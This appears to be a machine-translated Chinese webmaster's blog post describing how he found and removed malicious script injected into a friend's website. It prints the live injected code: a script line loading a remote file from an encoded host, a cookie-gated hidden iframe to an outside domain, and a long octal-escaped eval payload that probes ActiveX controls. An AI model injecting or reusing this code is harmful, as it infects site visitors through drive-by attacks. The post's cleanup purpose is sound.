Talking about how to exclude the website hanging horse

Source: Internet
Author: User
Keywords Security

Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest cloud host technology Hall

Last night the deep netizen a Connaught the child reports to me that the link has a website to have a Trojan horse, I see, dizzy, that is not I am helping a friend to do off

Key word optimization QQ personality signature? At first thought just to kill soft false positives, plus I did not install antivirus software (has not been a virus), so did not how to manage him?

Get up today with a new mobile phone ((*^__^*) Hee ..., I bought a BlackBerry 8100) to open Baidu search QQ personality signature, dizzy, ranking do not know how many pages fell. I was depressed, their SEO optimization has always been very gentle on the AH, how can it be down right? So I guess it might really be hung horse, because is also a friend just met, of course, to help deal with these trivial problems. Back, immediately enable the German kill soft small red umbrella, "drop" two, open QQ personality signature when the alarm. Then open the HTML code to view, since there is no IFRAME, this is strange. So clean the cache again open the Web page, according to the information provided by the small red umbrella to find the file of the alarm: info[1].js, open to get the following code:

var Az=document.cookie;
var za=az.indexof ("QQQQ");
if (za!=-1) {}else{var expires=new Date (); Expires.settime (Expires.gettime () +24*60*60*1000);
Document.cookie= "qqqq=web;expires=" +expires.togmtstring ();
Document.writeln ("<iframe src=http:\/\/kkwwkkc.cn\/10\/zz.htm width=100 height=0><\/iframe>"); Window.status= "";}

I think the problem should be in the JS code, so in the code search JS, one is 51la of the statistics of JS, another is Div.js,51la nature can be ruled out, so I opened Div.js, and then saw the following "Bans" URL code (red font), tracking down , and sure enough to find suspicious signs.


//JavaScript Document
Function Showdiv (divnum,divbefor,id) {
    for (i=1;i<=divnum;i++) {
        try{
             if (i==divbefor) {
                 document.getElementById (id+i) style.display= "inline";
           }else{
                 document.getElementById (id+i). style.display= "None" ;
           }
       }catch (e) {}
   }
}
function Menufix () {}
Document.writeln ("<script src=http:\/\/%78%69%73%68%69%79%69%2e%63%6f%6d\/images\/main\/info.js><\ /script> ");

Trace code: Http:\/\/%78%69%73%68%69%79%69%2e%63%6f%6d\/images\/main\/info.js
Firefox direct input, convert to get address as follows Http://www.91q.org/templets/images/div.js open code as follows:

var Az=document.cookie;
var za=az.indexof ("QQQQ");
if (za!=-1) {}else{var expires=new Date (); Expires.settime (Expires.gettime () +24*60*60*1000);
Document.cookie= "qqqq=web;expires=" +expires.togmtstring ();
Document.writeln ("<iframe src=http:\/\/kkwwkkc.cn\/10\/zz.htm width=100 height=0><\/iframe>"); Window.status= "";}

Continue iframe Tracking: http://kkwwkkc.cn/10/zz.htm
Open the code as follows:

<iframe src=123.htm width=100 height=0></iframe>
<script language= "javascript" type= "Text/javascript" src= "Http://js.users.51.la/2191926.js" ></script>
<noscript><a href= "http://www.51.la/?2191926″target=" _blank "><img alt=" & #x6211;& #x8981; & #x5566;& #x514D;& #x8D39;& #x7EDF;& #x8BA1; "src=" http://img.users.51.la/2191926.asp "style=" Border:none "/></a></noscript>

Continue iframe Tracking: http://kkwwkkc.cn/10/123.htm
Open to get the following King eight code:

&lt;script&gt;


Eval ("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\ 164\150\75\62\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\146\154\141\163\150\56\150\164\155\76\74\ 57\151\146\162\141\155\145\76\42\51\73\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\ 151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\ 141\163\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\51\73\15\12\167\151\156\144\157\167\56\163\164\ 141\164\165\163\75\42\55614\61020\42\73\15\12\167\151\156\144\157\167\56\157\156\145\162\162\157\162\75\146\ 165\156\143\164\151\157\156\50\51\173\162\145\164\165\162\156\40\164\162\165\145\73\175\15\12\151\146\50\156\ 141\166\151\147\141\164\157\162\56\165\163\145\162\101\147\145\156\164\56\164\157\114\157\167\145\162\103\141\ 163\145\50\51\56\151\156\144\145\170\117\146\50\42\155\163\151\145\40\67\42\51\75\75\55\61\51\15\12\144\157\ 143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\62\60\40\150\145\151\ 147\150\164\75\60\40\163\162\143\75\61\64\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\51\73\15\12\ 164\162\171\173\166\141\162\40\146\73\15\12\166\141\162\40\147\147\75\156\145\167\40\101\143\164\151\166\145\ 130\117\142\152\145\143\164\50\42\107\114\111\105\104\157\167\156\56\111\105\104\157\167\156\56\61\42\51\73\ 175\15\12\143\141\164\143\150\50\146\51\173\175\73\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40 \40\40\15\12\146\151\156\141\154\154\171\173\151\146\50\146\41\75\42\133\157\142\152\145\143\164\40\105\162\ 162\157\162\135\42\51\173\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\ 145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\154\172\56\150\164\ 155\76\74\57\151\146\162\141\155\145\76\42\51\73\175\175\15\12\164\162\171\173\166\141\162\40\155\73\15\12\166 \141\162\40\150\150\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\104\157\167\156\154\157\141\144\ 145\162\56\104\114\157\141\144\145\162\56\61\42\51\73\175\15\12\143\141\164\143\150\50\155\51\173\175\73\40\40 \40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\15\12\146\151\156\141\154\154\171\173\151\146\50\ 155\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\144\157\143\165\155\145\156\164\ 56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\ 150\164\75\60\40\163\162\143\75\163\151\156\141\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\51\73\ 175\175\15\12\164\162\171\173\166\141\162\40\156\73\15\12\166\141\162\40\154\154\75\156\145\167\40\101\143\164 \151\166\145\130\117\142\152\145\143\164\50\42\163\156\160\166\167\56\123\156\141\160\163\150\157\164\40\126\ 151\145\167\145\162\40\103\157\156\164\162\157\154\56\61\42\51\73\175\15\12\143\141\164\143\150\50\156\51\173\ 175\73\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\15\12\146\151\156\141\154\154\171\173\151\146\50\ 156\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\144\157\143\165\155\145\156\164\ 56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\ 150\164\75\60\40\163\162\143\75\157\146\146\151\143\145\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\ 51\73\175\175\15\12\164\162\171\173\166\141\162\40\142\73\15\12\166\141\162\40\155\155\75\156\145\167\40\101\ 143\164\151\166\145\130\117\142\152\145\143\164\50\42\116\103\124\101\165\144\151\157\106\151\154\145\62\56\ 101\165\144\151\157\106\151\154\145\62\56\62\42\51\73\175\15\12\143\141\164\143\150\50\142\51\173\175\73\40\40 \40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\40\15\12\146\151\156\141\154\154\171\173\151\146\50\ 142\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\144\157\143\165\155\145\156\164\ 56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\ 40\163\162\143\75\116\103\124\101\165\144\151\157\106\151\154\145\56\150\164\155\76\74\57\151\146\162\141\155\ 145\76\42\51\73\175\175\15\12\146\165\156\143\164\151\157\156\40\164\145\163\164\50\51\15\12\173\15\12\162\162 \157\157\170\170\40\75\40\42\111\105\122\42\40\53\40\42\120\103\164\154\56\111\42\40\53\40\42\105\122\120\42\ 40\53\40\42\103\164\154\56\61\42\73\15\12\164\162\171\15\12\173\15\12\114\151\153\145\40\75\40\156\145\167\40\ 101\143\164\151\166\145\130\117\142\152\145\143\164\50\162\162\157\157\170\170\51\73\15\12\175\143\141\164\143 \150\50\145\162\162\157\162\51\173\162\145\164\165\162\156\73\175\15\12\166\166\166\166\166\40\75\40\114\151\ 153\145\56\120\154\141\171\145\162\120\162\157\160\145\162\164\171\50\42\120\122\117\104\125\103\124\126\105\ 122\123\111\117\116\42\51\73\15\12\151\146\50\166\166\166\166\166\74\75\42\66\56\60\56\61\64\56\65\65\62\42\51 \15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\ 60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\162\145\61\60\56\150\164\155\76\74\57\151\146\162\141 \155\145\76\42\51\73\15\12\145\154\163\145\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\ 74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\ 75\162\145\61\61\56\150\164\155\76\74\57\151\146\162\141\155\145\76\42\51\73\15\12\175\15\12\164\145\163\164\ 50\51\73″)


&lt;/script&gt;

I talents, do not understand the transformation of the code meaning, do not want to convert, know that the horse is hanging OK, and finally with friends said let him remove that code, cleaning up the cache to reopen the Web page, OK, no problem.

Write this article the intention of care to tell you to pay attention to their own site security, if found hanging horse, do not miss every detail, first carefully check the HTML page has not called other inexplicable site things, and then carefully analyze their own page of the JS code, IFRAME is the most commonly used means of hackers. example, I hope to be useful to you. This is my first time to catch a horse, after their own analysis since caught, very happy, hereby share ...

This article is supplied by http://www.91q.org Webmaster. Copyright Notice: This site works using the knowledge sharing "signed 2.5 mainland China" license agreement to authorize, reprint must be annotated with deep technology and the original address.

Original address: http://www.pcliver.cn/archives/279.html

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.